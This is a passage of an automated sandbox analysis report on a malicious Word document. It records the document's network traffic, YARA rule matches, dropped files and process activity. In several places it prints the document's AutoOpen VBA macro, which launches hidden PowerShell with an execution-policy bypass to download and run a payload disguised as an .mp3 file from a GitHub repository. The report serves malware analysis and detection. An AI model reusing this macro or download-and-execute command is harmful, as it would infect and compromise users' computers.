Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/api/v1.0/me/Activities
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://outlook.office365.com/autodiscover/autodiscover.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://ovisualuiapp.azurewebsites.net/pbiagave/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/appshome.aspx?productgroup=Outlook
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/review/query
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pages.store.office.com/webapplandingpage.aspx
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://partnerservices.getmicrosoftkey.com/PartnerProvisioning.svc/v1/subscriptions
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.json
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://portal.office.com/account/?ref=ClientMeControl
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://posarprodcssservice.accesscontrol.windows.net/v2/OAuth2-13
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerlift-user.acompli.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerlift.acompli.net
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://prod-global-autodetect.acompli.net/autodetect
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.json
Source: powershell.exe, 00000003.00000002.556946982.00000000053DF000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/2.mp3
Source: powershell.exe, 00000003.00000002.556805332.0000000005386000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com/ssbb36/stv/main/5.mp3
Source: powershell.exe, 00000003.00000002.556805332.0000000005386000.00000004.00000001.sdmp String found in binary or memory: https://raw.githubusercontent.com4
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://res.getmicrosoftkey.com/api/redemptionevents
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://roaming.edog.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://rpsticket.partnerservices.getmicrosoftkey.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://settings.outlook.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://shell.suite.office.com:1443
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://skyapi.live.net/Activity/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://sr.outlook.office.net/ws/speech/recognize/assistant/work
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://staging.cortana.ai
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://storage.live.com/clientlogs/uploadlocation
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.cn/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.com/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://store.office.de/addinstemplate
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://substrate.office.com/search/api/v1/SearchHistory
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://substrate.office.com/search/api/v2/init
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFile
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://tasks.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.cdn.office.net/mirrored/smartlookup/current/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.desktop.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://uci.officeapps.live.com/OfficeInsights/web/views/insights.immersive.html
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://visio.uservoice.com/forums/368202-visio-on-devices
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://web.microsoftstream.com/video/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://webshell.suite.office.com
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://word.uservoice.com/forums/304948-word-for-ipad-iphone-ios
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://wus2.contentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://wus2.pagecontentsync.
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://www.bingapis.com/api/v7/urlpreview/search?appid=E93048236FE27D972F67C5AF722136866DF65FA2
Source: 2109C5E4-0DC6-42DF-9710-C3E57C2BDC83.0.dr String found in binary or memory: https://www.odwebp.svc.ms
Source: unknown DNS traffic detected: queries for: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/5.mp3 HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: raw.githubusercontent.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/5.mp3 HTTP/1.1Host: github.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/2.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/3.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com
Source: global traffic HTTP traffic detected: GET /ssbb36/stv/raw/main/4.mp3 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.17134.1Host: github.com

System Summary:

barindex
Found detection on Joe Sandbox Cloud Basic with higher score
Source: RfORrHIRNe.doc Joe Sandbox Cloud Basic: Detection: malicious Score: 88 Perma Link
Powershell drops PE file
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Document contains an embedded VBA macro with suspicious strings
Source: RfORrHIRNe.doc OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen, String powershell: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')") Name: Autoopen
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE, VBA macro line: Shell ("Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')")
Yara signature match
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: RfORrHIRNe.doc, type: SAMPLE Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.552672954.00000000031B0000.00000004.00000020.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: 00000003.00000002.556594505.0000000005261000.00000004.00000001.sdmp, type: MEMORY Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: Process Memory Space: powershell.exe PID: 6268, type: MEMORYSTR Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Temp\~DFF551811DB4F781F3.TMP, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp, type: DROPPED Matched rule: PowerShell_in_Word_Doc date = 2017-06-27, author = Florian Roth, description = Detects a powershell and bypass keyword in a Word document, reference = Internal Research - ME, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, score = 4fd4a7b5ef5443e939015276fc4bf8ffa6cf682dd95845ef10fdf8158fdd8905
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Source: C:\Users\user\Documents\20211104\PowerShell_transcript.141700.Lg6KA_8X.20211104015721.txt, type: DROPPED Matched rule: PowerShell_Susp_Parameter_Combo date = 2017-03-12, author = Florian Roth, description = Detects PowerShell invocation with suspicious parameters, reference = https://goo.gl/uAic1X, score = file, modified = 2021-09-28
Document has an unknown application name
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE indicator application name: unknown
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator application name: unknown
Detected potential crypto function
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08178AC0 3_2_08178AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08178AC0 3_2_08178AC0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08170006 3_2_08170006
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 3_2_08170040 3_2_08170040
Document contains an embedded VBA macro which executes code when the document is opened / closed
Source: RfORrHIRNe.doc OLE, VBA macro line: Sub Autoopen()
Source: VBA code instrumentation OLE, VBA macro: Module NewMacros, Function Autoopen Name: Autoopen
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE, VBA macro line: Sub Autoopen()
Document misses a certain OLE stream usually present in this Microsoft Office document type
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
Document contains no OLE stream with summary information
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE indicator has summary info: false
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator has summary info: false
Document contains embedded VBA macros
Source: RfORrHIRNe.doc OLE indicator, VBA macros: true
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE indicator, VBA macros: true
Source: RfORrHIRNe.doc Virustotal: Detection: 49%
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA Jump to behavior
Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') Jump to behavior
Source: RfORrHIRNe.doc OLE indicator, Word Document stream: true
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user\AppData\Roaming\Microsoft\Bibliography Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File created: C:\Users\user~1\AppData\Local\Temp\{E0FFF13A-584C-4B0E-BE73-75AB44A943FB} - OProcSessId.dat Jump to behavior
Source: classification engine Classification label: mal96.expl.winDOC@4/35@3/2
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6284:120:WilError_01
Source: RfORrHIRNe.doc OLE document summary: title field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: title field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: author field not present or empty
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr OLE document summary: edited time not present or 0
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: title field not present or empty
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: author field not present or empty
Source: ~DFF551811DB4F781F3.TMP.0.dr OLE document summary: edited time not present or 0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/settings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/document.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/fontTable.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/webSettings.xml
Source: ~WRD0000.tmp.0.dr Initial sample: OLE zip file path = word/glossary/styles.xml
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE File opened: C:\Windows\SysWOW64\MSVCR100.dll Jump to behavior
Source: ~WRF{D61BD148-3D9E-4808-8F18-A170FD975DFD}.tmp.0.dr Initial sample: OLE indicators vbamacros = False

Data Obfuscation:

barindex
Suspicious powershell command line found
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3')
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX(New-Object Net.WebClient).DownloadString('http://github.com/ssbb36/stv/raw/main/5.mp3') Jump to behavior
PE file contains sections with non-standard names
Source: temp54685.3.dr Static PE information: section name: _RDATA
PE file contains an invalid checksum
Source: temp54685.3.dr Static PE information: real checksum: 0x3c1ec38 should be:

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Drops PE files
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File created: C:\Users\user\AppData\Local\Temp\temp54685 Jump to dropped file
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
